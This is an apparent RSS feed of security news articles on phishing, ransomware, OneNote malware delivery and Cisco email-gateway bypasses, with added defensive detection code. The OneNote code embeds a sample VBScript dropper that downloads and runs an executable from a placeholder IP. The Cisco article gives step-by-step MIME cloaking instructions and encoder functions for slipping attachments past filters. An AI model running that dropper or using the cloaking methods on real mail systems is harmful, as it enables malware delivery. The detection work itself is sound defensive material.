Information Security Newspaper | Hacking News (https://www.securitynewspaper.com/), feed generated Fri, 24 Nov 2023 19:08:13 +0000

3 Prominent Data Security Risks in the Finance Industry
https://www.securitynewspaper.com/2023/06/20/3-prominent-data-security-risks-in-the-finance-industry/
Tue, 20 Jun 2023 12:43:00 +0000

Recent research shows that when people choose a bank service, they are more likely to choose one that promises to secure their data. 

For customers, sensitive data protection is even more important than low fees.

Financial institutions and services store large volumes of sensitive customer data, such as Social Security numbers, credit and debit card details and home addresses. In the wrong hands, this information leads to identity theft.

Therefore, when it comes to cybercrime in the financial sector, there is no space for mistakes.

But which cyber threats compromise data security in the finance sector?

Ransomware

Ransomware is a type of malware (malicious software) that encrypts the files on an infected system, making them unreadable. It then displays a ransom note on the victim’s screen demanding payment in exchange for the key that unlocks the files.

Without the right key, the victim could lose their data forever. This is also the reason why some companies will pay the ransom — to retrieve their important data.

When a bank is hit by ransomware, the institution can lose access to sensitive data such as customer names, home addresses, bank account information, IDs or driver’s license details, depending on which part of the system is compromised.

If leaked on the dark web or hacking forums (when the institution doesn’t pay the ransom), sensitive data can lead to identity fraud. What’s worse is that identity fraud is hardly ever a one-time occurrence. With the victim’s sensitive data online, there is a high chance they become repeat targets.

Why is it difficult to prevent ransomware?

Protecting financial institutions against ransomware is challenging. New types of this malware can bypass otherwise well-guarded security systems. Also, high-profile institutions get targeted by ransomware gangs that use more advanced hacking methods.

At the start of June 2023, the Spanish bank Globalcaja was hit by a ransomware attack. After discovering the intrusion, the bank stated that no sensitive customer data had been exposed, although several of its branches were affected.

The ransomware group known as Play was behind the attack.

According to the bank, its earlier investment in cybersecurity allowed it to contain the incident early and avoid both the reputational and the financial damage a data breach would have caused.

Phishing Attacks

Scammers often impersonate banks in their phishing campaigns, sending emails and SMS messages or making phone calls in the name of a trusted bank or card issuer. In its 2022 report, the FBI noted that phishing accounted for more victims than identity theft and credit card fraud.

When a bank discovers that its services and visual identity are being used for phishing, often all it can do is warn its customers to be vigilant about such scams.

In May 2023, a man from Montreal reported that scammers had stolen $13,000 from his bank account. A criminal impersonating a TD Bank employee called the retired teacher and led him to believe he was helping the bank catch a possible thief.

Claiming there was suspicious activity on the teacher’s account, the caller urged him to move the money into a crypto wallet the criminal controlled.

The victim, who normally gets notifications when suspicious activity takes place in his account, believes that the bank didn’t do enough to protect his finances.

Individual cases like this, where someone loses their life savings, are what most people picture when they think of phishing in the financial industry.

But because scammers go for the weakest link in cybersecurity, humans, banks themselves are targets too.

One of the largest phishing scams on record hit the Belgian bank Crelan in 2016. Scammers impersonated the CEO by email to trick the bank’s finance department into transferring money. Estimated losses exceeded $75 million.

Today, most companies combat phishing with awareness training that teaches the general workforce to recognize social engineering attacks.

Banks also send frequent emails that remind people that they wouldn’t ask them to send sensitive data via email or request it via phone. 

Still, phishing threats persevere.

They can be difficult to recognize, especially when the sender impersonates a highly trusted sender, such as a bank official or one’s boss.

Zero Day Exploits

Most security solutions scan a company’s attack surface for the signatures of already-known threats and weaknesses. Like any other organization, a financial institution cannot prepare for a threat its tools cannot yet detect.

Zero-day vulnerabilities take their name from the fact that the vendor has had “zero days” to fix the flaw before attackers start exploiting it to compromise user data.

In February 2023, Community Health Systems disclosed that Fortra’s GoAnywhere MFT, the software it used to transfer documents containing Social Security numbers, had a zero-day flaw, now tracked as CVE-2023-0669.

A ransomware group known as Clop exploited this zero-day flaw to obtain sensitive data from more than 130 organizations. All of them used the GoAnywhere file transfer program within their company.

A couple of weeks later, Hatch Bank also disclosed that the same zero-day flaw led to a breach of their system. The bank had to notify 140,000 users whose Social Security Numbers had been exposed in the attack.

The cases are currently under investigation, and many other victims are expected to come forward about the incident.

Final Word

The majority of cyberattacks are financially motivated. This makes the financial industry itself a logical target for opportunist criminals.

The most damaging cyber threats within the financial industry target customers’ sensitive data. Such incidents can damage the reputation of a financial institution, lead to identity theft for users, and cause major financial harm to the company in question.

Keeping the data private is already at the center of cybersecurity for the financial industry. Start with protecting the system with cybersecurity tools and introducing phishing awareness training for employees.

Investing in cybersecurity saves financial institutions millions that they could lose in potential cyber-attacks that compromise valuable user data.

New AiTM Phishing Attack Technique Makes It Easy to Hack Business Email Accounts
https://www.securitynewspaper.com/2023/06/12/new-aitm-phishing-attack-technique-makes-it-easy-to-hack-business-email-accounts/
Mon, 12 Jun 2023 22:31:43 +0000

Microsoft Defender researchers discovered a multi-stage adversary-in-the-middle (AiTM) phishing and business email compromise (BEC) attack that targeted firms providing banking and financial services. The attack began with the compromise of a trusted third-party vendor and progressed into a string of AiTM attacks and follow-on BEC activity that spread across many businesses. It demonstrates how AiTM and BEC threats abuse the trusted relationships between vendors, suppliers and partner organizations to commit financial fraud.

Although the attack achieved the usual aim of an AiTM phish followed by BEC, some of its components, notably the use of an indirect proxy rather than the traditional reverse-proxy technique, show how these threats keep evolving. The indirect proxy gave the attackers the freedom to tailor the phishing pages to their targets while still capturing session cookies. After signing in with a stolen cookie (a session replay attack), the threat actors registered new MFA methods without being challenged for MFA, because the tenant’s MFA policies had not been configured according to security best practices. A second phishing stage followed, in which more than 16,000 emails were sent to the victim’s contacts.

This attack highlights the intricacy of AiTM attacks and the extensive defenses needed to fend them off. A compromise of this kind requires remediation beyond the conventional response to identity compromise, such as resetting a password: affected organizations also need to revoke the user’s session cookies and undo any MFA changes the attacker made. The case also shows the need for proactive threat hunting that looks for new tactics, techniques and procedures (TTPs) in previously recognized campaigns, so that threats of this kind can be identified and removed.

An adversary-in-the-middle attack intercepts the authentication flow between a user and a genuine authentication service in order to compromise the identity or carry out other operations. The attacker sits between the user and the service to capture the credentials, relay the MFA step and obtain the session cookie. The attacker can then impersonate the user by replaying the session cookie, before the token expires, without any involvement from the user and without a further MFA prompt. That session gave the attackers access to the compromised user’s resources and applications and let them carry out further malicious operations, including BEC. In the indirect proxy approach, the attackers host the phishing site themselves, so they control what the page displays and can adapt it to the situation; because they own the infrastructure, they can also stand up several servers at once to evade detection. Unlike a classic reverse-proxy AiTM attack, no HTTP packets are proxied between the victim and the real site; instead, the attacker’s server communicates directly with the real website.

After a valid password has been entered and validated, the attacker’s server shows a fake MFA page if MFA is required. Once the user supplies their MFA token, the adversary uses that same token in the session they have started with the authentication provider. When authentication completes, the session token is issued to the attacker and the victim is redirected to another page. The attack stages were as follows:

Stage 1: Initial access via a trusted vendor breach

Phishing emails purporting to come from reputable suppliers to the targeted companies were the first step in the campaign. A seven-digit number was used as the subject line of the phishing email that was sent. Because this code was different for each of the organizations that were targeted, it is probable that the attacker used it as a tracking method.

Stage 2: Clicking a harmful URL

Threat actors often abuse genuine services and brands to evade detection. In this case, Microsoft determined that the actor behind the phishing campaign used the legitimate online design tool Canva to host the lure.

Stage 3: AiTM attack

When the user tried to access the URL, they were instead sent to a phishing website that was hosted on Tencent’s cloud infrastructure and imitated a Microsoft sign-in page.

Stage 4: Replay of the session cookie

An impersonation attack known as a stolen session cookie replay attack occurs when an adversary utilizes a genuine cookie that was stolen in order to fool authentication measures such as passwords and multi-factor authentication.

Stage 5: Modifying the MFA process

The attacker then registered a new multi-factor authentication method for the target’s account, a phone-based one-time password (OTP), so that they could sign in with the stolen credentials later without being discovered.

Stage 6: Developing an inbox rule

Later, the attacker signed in with the new session token and created an inbox rule that moved all incoming mail in the user’s mailbox to the Archive folder and marked it as read.
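Stages 4 to 6 leave a recognizable trail in the tenant’s audit logs: a sign-in from an address the user has never used, a new MFA method registered from that same address, and an inbox rule that sweeps all incoming mail into Archive and marks it as read. The following Python is an added example (not code from Microsoft or from the original article) that correlates those three signals per user. The records it runs on are constructed, and their field names (UserId, Operation, ClientIP, Parameters) are a simplified assumption loosely modelled on the Microsoft 365 unified audit log rather than its real schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Inbox-rule destinations attackers use to keep mail out of the owner's sight.
HIDING_FOLDERS = {"archive", "deleted items", "junk email", "rss subscriptions"}

# Constructed sample records (simplified field names, not the real audit schema).
# The first four events mirror stages 3-6 for one user; the last two are a
# normal user creating a narrowly scoped rule, which must not be flagged.
SAMPLE_LOG = [
    {"CreationTime": "2023-05-02T08:01:00", "UserId": "finance@contoso.example",
     "Operation": "UserLoggedIn", "ClientIP": "198.51.100.10"},
    {"CreationTime": "2023-05-02T09:14:00", "UserId": "finance@contoso.example",
     "Operation": "UserLoggedIn", "ClientIP": "203.0.113.77"},       # replayed cookie
    {"CreationTime": "2023-05-02T09:16:00", "UserId": "finance@contoso.example",
     "Operation": "User registered security info", "ClientIP": "203.0.113.77"},
    {"CreationTime": "2023-05-02T09:20:00", "UserId": "finance@contoso.example",
     "Operation": "New-InboxRule", "ClientIP": "203.0.113.77",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "MoveToFolder", "Value": "Archive"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"CreationTime": "2023-05-02T10:00:00", "UserId": "alice@contoso.example",
     "Operation": "UserLoggedIn", "ClientIP": "198.51.100.22"},
    {"CreationTime": "2023-05-02T10:05:00", "UserId": "alice@contoso.example",
     "Operation": "New-InboxRule", "ClientIP": "198.51.100.22",
     "Parameters": [{"Name": "Name", "Value": "newsletters"},
                    {"Name": "From", "Value": "news@vendor.example"},
                    {"Name": "MoveToFolder", "Value": "Archive"}]},
]


def rule_hides_mail(parameters):
    """True when a rule sweeps mail out of sight without a narrow sender/subject filter."""
    p = {x["Name"].lower(): str(x["Value"]).lower() for x in parameters}
    hides = p.get("movetofolder") in HIDING_FOLDERS or p.get("deletemessage") == "true"
    narrow = any(k in p for k in ("from", "subjectcontainswords", "bodycontainswords"))
    return hides and (not narrow or p.get("markasread") == "true")


def hunt(records, window=timedelta(hours=24)):
    """Per user: a sign-in from a never-seen IP, then MFA-method registration and/or a
    mail-hiding inbox rule from that same IP within `window`. Two signals raise an alert."""
    by_user = defaultdict(list)
    for r in records:
        by_user[r["UserId"]].append(r)
    alerts = []
    for user, events in by_user.items():
        events.sort(key=lambda r: r["CreationTime"])
        seen_ips, signals = set(), {}
        for e in events:
            ts, ip, op = datetime.fromisoformat(e["CreationTime"]), e["ClientIP"], e["Operation"]
            if op == "UserLoggedIn":
                # The first login seen is treated as baseline; later unknown IPs start a chain.
                if seen_ips and ip not in seen_ips:
                    signals = {"new_ip_login": (ts, ip)}
                seen_ips.add(ip)
                continue
            start = signals.get("new_ip_login")
            if not start or ip != start[1] or ts - start[0] > window:
                continue
            if op == "User registered security info":
                signals["mfa_method_added"] = (ts, ip)
            elif op == "New-InboxRule" and rule_hides_mail(e.get("Parameters", [])):
                signals["hiding_inbox_rule"] = (ts, ip)
        if len(signals) >= 2:
            alerts.append({"user": user, "ip": signals["new_ip_login"][1],
                           "signals": sorted(signals)})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_LOG):
        print(alert)
```

The rule check deliberately treats "move everything to Archive and mark it read" as suspicious while letting a rule with a From filter through; in a real tenant the baseline of known IPs would come from weeks of sign-in history rather than from the first event in the batch.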

Stage 7: Phishing operation

After creating an Inbox rule, the attacker started a large-scale phishing effort that included more than 16,000 emails with a Canva URL that had been slightly changed. The emails were sent to distribution lists in addition to the contacts of the compromised user, who may have been located either within or outside of the business. The recipients were identified using the most recent email threads found in the inbox of the individual whose account had been hijacked.

Stage 8: BEC strategies and tactics

The attacker then searched the target’s mailbox for undelivered and out-of-office replies and removed them from the Archive folder. They also read the messages from recipients who questioned the legitimacy of the phishing email and replied to them, most likely to give the impression that the email was genuine.

Stage 9: Compromised Accounts

Recipients inside the company who clicked the links in those emails and navigated to the fraudulent websites were subjected to a second AiTM attack.

Stage 10: BEC in its second stage

After the second AiTM attack, it was discovered that the attacker was launching a new phishing campaign from the inbox of one of the users whose account had been hacked.

Send spoofed phishing emails to Gmail accounts
https://www.securitynewspaper.com/2023/06/06/send-spoofed-phishing-emails-to-gmail-accounts/
Tue, 06 Jun 2023 14:19:00 +0000

Gmail is the most widely used email service, with a staggering 1.5 billion users, roughly 18.75% of the world’s population. Its security mechanisms are well known for their effectiveness in stopping hackers from taking over user accounts.

Gmail recently added a feature that displays a blue verified checkmark next to the name of a sender that has been verified as a legitimate brand, such as Apple or Google. The checkmark builds on Brand Indicators for Message Identification (BIMI) and was introduced to distinguish mail from genuine businesses from that of spammers and impersonators.

However, a threat actor found a way to abuse this feature and send spam that carries the blue checkmark. Security researcher Chris Plummer discovered the flaw and reported it to Google.

Google initially closed the report as “Intended Behaviour”, with the status “Will not Fix”.

The researcher disagreed, explaining that the email’s route was not a legitimate one. In his words: “The sender discovered a way to trick gmail’s authoritative stamp of approval, which end users will trust. I received this message on O365 after it originated from a Facebook account that was located in the United Kingdom. Nothing of this is even somewhat credible.”

After a string of tweets by the researcher, Google reopened the issue as a top-priority (P1) bug and is now working on a fix. Google also apologized for its original response: “After taking a deeper look, we found that this certainly doesn’t appear like a general SPF issue. As a result, we are revisiting this, and the relevant team is having a closer look at what has been going on. We sincerely appreciate you for insisting that we take a more in-depth look at this matter, and we would like to extend our apologies once again for the misunderstanding. We are aware that our original reaction may have been one of irritation.”

Researchers put significant effort into finding high-impact vulnerabilities in large technology companies. When a company closes a high-priority report in a flash and marks it “Won’t fix”, it makes the researcher and their work look bad.

New phishing technique allows hacking someone using .zip & .mov domains
https://www.securitynewspaper.com/2023/05/31/new-phishing-technique-to-allows-hacking-someone-using-zip-mov-domains/
Wed, 31 May 2023 14:27:00 +0000

When a victim visits a website ending in .ZIP, a recently developed phishing method known as “file archiver in the browser” may be used to “emulate” file-archiving software in the target’s web browser.

According to information published by the security researcher mr.d0x last week, “with this phishing attack, you simulate a file archiver software (e.g., WinRAR) in the browser and use a .zip domain to make it appear more legitimate.”

In a nutshell, threat actors can build a realistic-looking phishing landing page in HTML and CSS that mimics genuine file-archiving software, then host it on a .zip domain, which takes the social engineering to a higher level.

When a user clicks on a file that is “contained” inside the false ZIP package, a malicious actor might exploit this deception to redirect them to a website that collects credentials and use those credentials to gain access to the user’s account.


The search box in Windows File Explorer can also become a deceptive doorway. If a user searches for a file that does not exist and the name typed matches a registered .zip domain, Windows opens that domain in the web browser instead of reporting that no such file was found.

This comes as Google introduced eight new top-level domains (TLDs), among them “.zip” and “.mov”, a move that has raised concern that it may encourage phishing and other forms of online fraud.

This is due to the fact that .ZIP and .MOV are both valid file extension names, which has the ability to trick unwary users into visiting a malicious website rather than opening a file, which then leads to the user inadvertently installing malware.

Organizations and individual users can defend themselves against attacks that abuse these TLDs by being cautious with URLs that use unfamiliar top-level domains and by not clicking them unless they are sure they are genuine; hovering the mouse over a link previews the URL it actually points to. In addition, businesses and software developers should make sure their tools, scripts and applications do not rely on file-name extensions but verify a file’s type from its headers. Otherwise a URL may trigger unwanted or even dangerous behavior from those tools and scripts.
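To make the header-based check concrete, here is an added Python example (not from the original article or from mr.d0x) that does two things: it decides whether a bare name such as invoice.zip would be treated as a hostname rather than a file, and it identifies a file’s real type from its leading bytes instead of its extension. The file names, the byte strings and the sample sentence it runs on are constructed for the example.

```python
import re
from typing import Optional

# The two of Google's new TLDs that collide with common file extensions.
FILE_LIKE_TLDS = {"zip", "mov"}

# A bare token such as "invoice.zip" is a syntactically valid hostname, so a browser
# address bar, the Explorer search box or an auto-linker may treat it as one.
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+([a-z]{2,63})$", re.I)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
TOKEN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:zip|mov)\b", re.I)


def sniff_type(data: bytes) -> str:
    """Identify content from its leading bytes, never from the name."""
    if data[:4] in (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08"):
        return "zip"
    if len(data) >= 12 and data[4:8] in (b"ftyp", b"moov", b"mdat", b"wide", b"free"):
        return "mov"             # QuickTime / ISO base media atom layout
    if data[:2] == b"MZ":
        return "exe"
    if data[:5] == b"%PDF-":
        return "pdf"
    return "unknown"


def classify(reference: str, data: Optional[bytes] = None) -> dict:
    """Report whether `reference` would open as a URL instead of a local file and,
    when the bytes are available, whether the extension matches the real type."""
    ref = reference.strip()
    ext = ref.rsplit(".", 1)[-1].lower() if "." in ref else ""
    host = HOSTNAME_RE.match(ref)
    as_url = bool(SCHEME_RE.match(ref)) or bool(host and host.group(1).lower() in FILE_LIKE_TLDS)
    sniffed = sniff_type(data) if data is not None else None
    return {"reference": ref, "extension": ext, "treated_as_url": as_url,
            "sniffed_type": sniffed,
            "mismatch": sniffed not in (None, "unknown") and sniffed != ext}


def find_url_like_filenames(text: str) -> list:
    """File names in free text that a mail client may silently turn into links."""
    return [t for t in TOKEN_RE.findall(text) if classify(t)["treated_as_url"]]


if __name__ == "__main__":
    print(classify("invoice.zip", b"PK\x03\x04" + b"\x00" * 26))
    print(find_url_like_filenames("Review q2-report.zip and demo.mov; notes.txt is attached."))
```

A file named statement.pdf whose bytes start with the ZIP signature is reported as a mismatch, which is the check the paragraph above asks tools to perform; a name containing a space is not a valid hostname, so it is not reported as a link.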

New kind of phishing attack exploits Microsoft OneNote to bypass disabled macros
https://www.securitynewspaper.com/2023/01/25/new-kind-of-phishing-attacks-are-exploiting-microsoft-onenote-to-bypass-disabled-macro/
Wed, 25 Jan 2023 22:07:41 +0000

OneNote is one of the most popular components of the Microsoft 365 suite and is still being actively developed, with new updates released regularly. Security professionals are now warning about threat actors who use OneNote files, delivered as phishing email attachments, to covertly plant malware on users’ machines. Rather than exploiting a vulnerability, the attackers abuse a legitimate feature: a OneNote notebook can embed arbitrary files, including scripts.

The attackers trick the user into double-clicking an embedded attachment inside the OneNote file. OneNote then runs the embedded script, which downloads malware from a remote server. Once infected, the device can be used not just to steal passwords but also to attack cryptocurrency wallets or to install further software without the user’s knowledge.

Microsoft earlier blocked macros by default in Office documents downloaded from the internet, which stopped malicious actors from using Excel and Word files to distribute malware, and Windows now shows security warnings before opening files delivered inside ZIP and ISO containers from the internet. Hackers have found ways around the macro block that still let them spread malware. The phishing emails carry a variety of bogus attachments, including fake invoices, delivery confirmations and alerts.

Usually the OneNote page shows a blurred image with an overlay that reads “Double Click to View File”. Hidden beneath that overlay is the embedded attachment, typically a Visual Basic Script file; double-clicking it runs the script, which contacts a remote server to install malware, including a range of trojans. The script does not exploit a flaw in Visual Basic: it is ordinary code that OneNote executes once the user clicks through its “Opening attachments could harm your computer” warning.
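Because the malicious script is stored as an embedded file object inside the notebook, a mail gateway or an analyst can carve it out without ever opening OneNote. The following Python is an added example, not code from the original article: it scans a .one file for FileDataStoreObject structures, whose header and footer GUIDs come from Microsoft’s [MS-ONE] file format specification, and classifies each payload. The notebook bytes it runs on are a constructed stub that reproduces only that object layout, and the dropper script, its URL and the decoy image are invented for the example.

```python
import re
import struct

# FileDataStoreObject header and footer GUIDs from Microsoft's [MS-ONE] specification,
# {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} and {71FBA722-0F79-4A0B-BB13-899256426B24},
# as they appear on disk (GUID fields stored little-endian).
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
FDSO_HEADER_LEN = 16 + 8 + 4 + 8      # guidHeader, cbLength, unused, reserved

SCRIPT_MARKERS = re.compile(
    rb"(?i)(createobject\(|wscript\.|<script|powershell|@echo off|cmd(?:\.exe)?\s*/c|mshta)")


def kind_of(payload: bytes) -> str:
    """Coarse type of an embedded object, decided from its content."""
    if payload[:2] == b"MZ":
        return "executable"
    if payload[:4] == b"PK\x03\x04":
        return "zip"
    if payload[:8] == b"\x89PNG\r\n\x1a\n" or payload[:3] == b"\xff\xd8\xff":
        return "image"
    if payload[:5] == b"%PDF-":
        return "pdf"
    if SCRIPT_MARKERS.search(payload):
        return "script"
    return "other"


def carve_embedded_files(onenote: bytes) -> list:
    """Walk every FileDataStoreObject in the file and classify its payload."""
    found, pos = [], 0
    while (off := onenote.find(FDSO_HEADER, pos)) != -1:
        (size,) = struct.unpack_from("<Q", onenote, off + 16)     # cbLength
        start = off + FDSO_HEADER_LEN
        payload = onenote[start:start + size]
        found.append({"offset": off, "size": size, "kind": kind_of(payload),
                      "footer_ok": onenote[start + size:start + size + 16] == FDSO_FOOTER,
                      "payload": payload})
        pos = start + max(size, 1)
    return found


def suspicious(onenote: bytes) -> list:
    """Objects worth blocking: anything scripted or executable, or a truncated object."""
    return [o for o in carve_embedded_files(onenote)
            if o["kind"] in ("script", "executable") or not o["footer_ok"]]


def fdso(payload: bytes) -> bytes:
    """Build one FileDataStoreObject; used only to construct the sample below."""
    return FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 12 + payload + FDSO_FOOTER


# Constructed sample: a stub carrying two embedded objects in the real object layout
# (a genuine notebook has far more structure around them). The PNG header stands in for
# the "Double Click to View File" decoy; the VBScript is the dropper hidden under it.
DECOY_IMAGE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24
DROPPER_VBS = (b'Set o = CreateObject("WScript.Shell")\r\n'
               b'o.Run "powershell -w hidden -c iwr http://203.0.113.9/x.exe -o x.exe; .\\x.exe"\r\n')
SAMPLE_ONE = (b"constructed notebook stub" + b"\x00" * 64 + fdso(DECOY_IMAGE)
              + b"\x00" * 32 + fdso(DROPPER_VBS))


if __name__ == "__main__":
    for o in suspicious(SAMPLE_ONE):
        print(o["offset"], o["size"], o["kind"], o["payload"][:40])
```

The decoy image is carved but not reported; the script object is, together with its offset and size, so the gateway can quarantine the attachment on content rather than on the notebook extension.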

Separately, Microsoft has banned cryptocurrency mining on its online services, since that activity is often associated with unauthorized account use; this has markedly reduced the degradation and disruption of cloud services.

To protect themselves, OneNote users should not dismiss the warnings the program shows, and should use multi-factor authentication, antivirus software and firewalls wherever practical. They should also refrain from opening attachments or following links in emails from senders they do not recognize.

3 techniques that let phishing emails bypass Cisco Secure Email Gateway and are being actively used by ransomware gangs
https://www.securitynewspaper.com/2022/11/22/3-techniques-that-allow-bypassing-phishing-emails-through-cisco-secure-email-gateway-and-are-being-actively-used-by-ransomware-gangs/
Tue, 22 Nov 2022 16:39:18 +0000

The following techniques have been made public by a researcher who wishes to remain anonymous. They can be used to bypass some of the filters of Cisco’s Secure Email Gateway appliance and deliver malware using carefully crafted emails. The researcher said they had contacted the vendor but could not get a suitable answer in a timely manner, and that there should be no further delay in publishing because the attack complexity is minimal and exploits had already been disclosed by a third party.

The bypass techniques rely on the “error tolerance and various MIME decoding capabilities of email clients”. According to the researcher, an attacker can use one of three techniques to get past a Cisco Secure Email Gateway-protected enterprise, affecting email clients including Outlook, Thunderbird, Mutt and Vivaldi.

First approach: cloaked Base 64
————————————-

Step-by-step guidance:

  1. Use a conventional email client or standard MIME encoding, such as base64 content-transfer encoding, to create an email with the malicious attachment.
  2. Randomly insert CR+LF line breaks so that the lines of the base64 block have varying lengths, while keeping each group of four base64 characters (encoding three bytes) intact. This avoids violating the MIME standard while defeating simple heuristics that recognize base64 out of context.
  3. Place the contradictory header “Content-Transfer-Encoding: quoted-printable” before the attachment’s real content-transfer-encoding header. This is where the MIME standard is broken.
  4. Remove any content-length headers from the message.

Emails crafted this way pass through affected gateways with a verdict of clean, even when the attachment contains otherwise readily recognized malware such as the EICAR test file. Many well-known email clients, meanwhile, display the attachment and reproduce it accurately when it is saved.

Systems impacted

A zip file containing the Eicar test virus and Cisco Secure Email Gateways running AsyncOS 14.2.0-620, 14.0.0-698, and other versions were used to successfully test this attack. Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build 16.0.15726.20070), Mozilla Thunderbird 91.11.0 (64-bit), Vivaldi 5.5.2805.42, Mutt 2.1.4-1ubuntu1.1, and other email clients were among those that were impacted.

2nd approach: yEnc encoding
———————————-

The yEncode (yEnc) encoding is commonly used by Usenet clients, and some email clients can also decode MIME parts that use it. A remote attacker who applies this encoding to a malicious attachment can deliver the payload to a victim using such a client while evading detection by affected gateways. Other email clients leave the attachment undecoded, which renders it harmless.

Affected Systems:

A zip file containing the Eicar test virus and Cisco Secure Email Gateways running AsyncOS 14.2.0-620, 14.0.0-698, and other versions were used to successfully test this attack. Email client Mozilla Thunderbird 91.11.0 was impacted (64-bit).

Third approach: cloaked Quoted-Printable
—————————————————

This technique mirrors method 1 with the roles of quoted-printable and base64 reversed. The payload is encoded as quoted-printable, but every byte is encoded as =XX rather than only the non-printable bytes, and every line ends with a soft line break (continuation). The conflicting headers are now given in base64, then quoted-printable order.

Affected Systems:

A zip file containing the Eicar test virus and Cisco Secure Email Gateways running AsyncOS 14.2.0-620, 14.0.0-698, and other versions were used to successfully test this attack. Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1 were the affected email clients.
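All three techniques exploit the gap between what a strict scanner sees and what an error-tolerant client reconstructs, so a useful check is to parse the attachment the way such a client would and flag the tell-tale signs: duplicate Content-Transfer-Encoding headers, base64 with irregular line lengths, a yEnc body, or quoted-printable in which every byte is escaped. The Python below is an added example and not the researcher’s toolkit. The two sample messages it builds are constructed, and the payload is a benign stand-in for the EICAR zip used in the original tests.

```python
import base64
import email
import quopri
import re

B64_LINE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
QP_ESCAPE = re.compile(rb"=[0-9A-Fa-f]{2}")


def yenc_decode(lines):
    """Minimal yEnc decoder (technique 2): every byte is (c - 42) mod 256 and
    '=' escapes the next character, which carries an extra +64."""
    out, escape = bytearray(), False
    for line in lines:
        if line.startswith(b"=y"):            # =ybegin / =ypart / =yend control lines
            continue
        for c in line:
            if escape:
                out.append((c - 64 - 42) % 256)
                escape = False
            elif c == 0x3D:
                escape = True
            else:
                out.append((c - 42) % 256)
    return bytes(out)


def analyze(raw_message: bytes) -> list:
    """Flag attachments with ambiguous or non-standard encodings and reconstruct
    what an error-tolerant mail client would save to disk."""
    msg = email.message_from_bytes(raw_message)       # compat32 keeps duplicate headers
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctes = [v.strip().lower() for v in part.get_all("Content-Transfer-Encoding", [])]
        body = part.get_payload(decode=False).encode("ascii", "surrogateescape")
        lines = [l for l in body.splitlines() if l.strip()]
        flags, decoded = [], None
        if len(set(ctes)) > 1:
            flags.append("conflicting-cte")                    # step 3 of techniques 1 and 3
        if any(l.startswith(b"=ybegin") for l in lines):
            flags.append("yenc-body")                          # technique 2
            decoded = yenc_decode(lines)
        else:
            content = sum(len(l.rstrip(b"=")) for l in lines)
            escaped = sum(3 * len(QP_ESCAPE.findall(l)) for l in lines)
            if content and escaped / content > 0.9:
                flags.append("fully-escaped-quoted-printable")  # technique 3
                decoded = quopri.decodestring(b"\r\n".join(lines))
            elif lines and all(B64_LINE.match(l) for l in lines):
                if len({len(l) for l in lines}) > 1:
                    flags.append("irregular-base64-lines")      # technique 1, step 2
                try:
                    decoded = base64.b64decode(b"".join(lines))
                except ValueError:
                    decoded = None
        if flags:
            findings.append({"filename": part.get_filename(), "ctes": ctes,
                             "flags": flags, "decoded": decoded})
    return findings


def cloak_base64(payload: bytes, quads_per_line=(3, 1, 2, 4)) -> bytes:
    """Technique 1, step 2: base64 split into lines of irregular length, always on a
    4-character boundary so the block as a whole still decodes."""
    b64 = base64.b64encode(payload)
    quads = [b64[i:i + 4] for i in range(0, len(b64), 4)]
    lines, i = [], 0
    while i < len(quads):
        n = quads_per_line[len(lines) % len(quads_per_line)]
        lines.append(b"".join(quads[i:i + n]))
        i += n
    return b"\r\n".join(lines)


def cloak_qp(payload: bytes, per_line=12) -> bytes:
    """Technique 3: every byte as =XX, every line ending in a soft line break."""
    enc = b"".join(b"=%02X" % c for c in payload)
    return b"=\r\n".join(enc[i:i + 3 * per_line] for i in range(0, len(enc), 3 * per_line))


def build_message(cte_headers: bytes, body: bytes) -> bytes:
    """Constructed two-part message with one attachment part."""
    return (b"From: billing@vendor.test\r\nTo: ap@victim.test\r\nSubject: invoice 4711\r\n"
            b"MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary=\"b1\"\r\n\r\n"
            b"--b1\r\nContent-Type: text/plain\r\n\r\nPlease see the attached invoice.\r\n"
            b"--b1\r\nContent-Type: application/zip; name=\"invoice.zip\"\r\n" + cte_headers
            + b"Content-Disposition: attachment; filename=\"invoice.zip\"\r\n\r\n" + body
            + b"\r\n--b1--\r\n")


# Constructed payload: a benign stand-in for the EICAR zip the researcher used.
PAYLOAD = b"PK\x03\x04" + b"constructed benign stand-in for the EICAR test zip"
SAMPLE_CLOAKED_B64 = build_message(
    b"Content-Transfer-Encoding: quoted-printable\r\n"     # contradictory header first (step 3)
    b"Content-Transfer-Encoding: base64\r\n",
    cloak_base64(PAYLOAD))
SAMPLE_CLOAKED_QP = build_message(
    b"Content-Transfer-Encoding: base64\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n",
    cloak_qp(PAYLOAD))
```

Running analyze() on either sample returns the attachment with its conflicting encodings, the flag for the cloaking technique used and the bytes a tolerant client would write to disk, which is what a gateway should hand to its malware scanner instead of trusting the first Content-Transfer-Encoding header it reads.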

The researcher who revealed the bypass techniques pointed to an open source toolkit for creating test emails that probe how well security solutions defend against such attacks. According to the researcher, Cisco’s fix addresses the techniques used by that tool but does not block them entirely.

Phishing alert: Giving your condolences for Queen Elizabeth II can leave your data in the hands of cybercriminals
https://www.securitynewspaper.com/2022/09/15/phishing-alert-giving-your-condolences-for-queen-elizabeth-ii-can-leave-your-data-in-the-hands-of-cybercriminals/
Thu, 15 Sep 2022 20:57:35 +0000

Cybercriminals are taking advantage of the death of Queen Elizabeth II to launch phishing attacks, specifically these scammers directing users to malicious pages that are designed to steal Microsoft credentials.

